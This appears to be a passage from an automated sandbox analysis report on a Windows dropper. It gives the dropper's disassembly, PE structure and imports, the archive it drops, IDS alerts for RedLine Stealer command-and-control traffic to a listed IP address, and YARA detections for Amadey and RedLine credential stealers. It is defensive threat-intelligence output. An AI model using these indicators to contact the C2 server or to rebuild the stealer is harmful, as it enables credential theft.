                                                                                                                                                                                                                                          call 00007FE66CB321A7h
                                                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                                                          mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                          call dword ptr [0040A184h]
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                          mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                          mov edi, ebx
                                                                                                                                                                                                                                          mov edx, 004088ACh
                                                                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007FE66CB31A2Ah
                                                                                                                                                                                                                                          cmp eax, esi
                                                                                                                                                                                                                                          jne 00007FE66CB31A19h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                          mov edi, esi
                                                                                                                                                                                                                                          jmp 00007FE66CB31A22h
                                                                                                                                                                                                                                          push 000003E8h
                                                                                                                                                                                                                                          call dword ptr [0040A188h]
                                                                                                                                                                                                                                          jmp 00007FE66CB319E9h
                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007FE66CB31A1Ch
                                                                                                                                                                                                                                          push 0000001Fh
                                                                                                                                                                                                                                          call 00007FE66CB31F3Bh
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          jmp 00007FE66CB31A4Ch
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                          jne 00007FE66CB31A3Eh
                                                                                                                                                                                                                                          mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          push 004010C4h
                                                                                                                                                                                                                                          push 004010B8h
                                                                                                                                                                                                                                          call 00007FE66CB31B66h
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007FE66CB31A29h
                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                          mov eax, 000000FFh
                                                                                                                                                                                                                                          jmp 00007FE66CB31B49h
                                                                                                                                                                                                                                          mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                          jne 00007FE66CB31A2Dh
                                                                                                                                                                                                                                          push 004010B4h
                                                                                                                                                                                                                                          push 004010ACh
                                                                                                                                                                                                                                          call 00007FE66CB320F5h
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                          mov dword ptr [000088B0h], 00000000h
                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xbb4e8.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000x888.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0xc0000xbc0000xbb600False0.950375771347565data7.921406954252342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .reloc0xc80000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                          AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                                                          RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                                                          RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                                                          RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                                                          RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                                                          RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                                                          RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                                                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0x28bb00x9d80aMicrosoft Cabinet archive data, many, 645130 bytes, 2 files, at 0x2c +A "fxV11fe.exe" +A "doa18JW.exe", ID 1919, number 1, 27 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63bc0x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63c00x24dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63e40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63ec0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63f40x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63f80xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64040x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64080xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64140x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64180x6dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64200x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64280x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_GROUP_ICON0xc64300xbcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xc64ec0x408dataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xc68f40x410dataRussianRussia
                                                                                                                                                                                                                                          RT_MANIFEST0xc6d040x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                          GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                          USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                          msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                                                          Cabinet.dll
                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                          RussianRussia
                                                                                                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          193.233.20.11192.168.2.44131496962043234 02/10/23-11:38:31.544987TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          192.168.2.4193.233.20.114969641312043231 02/10/23-11:38:44.271780TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          192.168.2.4193.233.20.114969641312043233 02/10/23-11:38:29.869058TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.512177944 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.535294056 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.535464048 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.869057894 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.892193079 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.989321947 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.521519899 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.544986963 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.677000046 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.263556004 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288079977 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288135052 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288166046 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288395882 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.215682983 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.241307020 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.291692972 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.355961084 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.379342079 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.426852942 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.450423002 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.491636992 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.552088022 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.574949026 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.574976921 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.575495958 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.612013102 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.635152102 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.636643887 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.659801960 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.709255934 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.786338091 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.809835911 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.849903107 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.916970968 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.940216064 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.944535971 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.967725039 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.969716072 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.992794037 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.012335062 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.035763025 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.084203959 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.212656975 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.236876965 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.265414000 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.288861990 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.334428072 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.419570923 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.442635059 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.443034887 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.490468979 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.701560974 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.724575996 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.724610090 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.725080967 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.771733046 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.187405109 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.211038113 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.247586012 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.271195889 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.271780014 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.295082092 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:44.330461979 CET496964131192.168.2.4193.233.20.11

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                                                                                          File size:801792 bytes
                                                                                                                                                                                                                                          MD5 hash:F83EF0C72937A6C833BFE8D3511317E5
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          Imagebase:0xa00000
                                                                                                                                                                                                                                          File size:610816 bytes
                                                                                                                                                                                                                                          MD5 hash:AC6FB170803555E15DA3A1BA13CBC6D3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                          File size:206848 bytes
                                                                                                                                                                                                                                          MD5 hash:AFC0E8E01E2B88123841047710836075
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:11:38:02
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                          File size:11264 bytes
                                                                                                                                                                                                                                          MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:11:38:13
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          Imagebase:0xd70000
                                                                                                                                                                                                                                          File size:179200 bytes
                                                                                                                                                                                                                                          MD5 hash:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:11:38:14
                                                                                                                                                                                                                                          Start date:10/02/2023
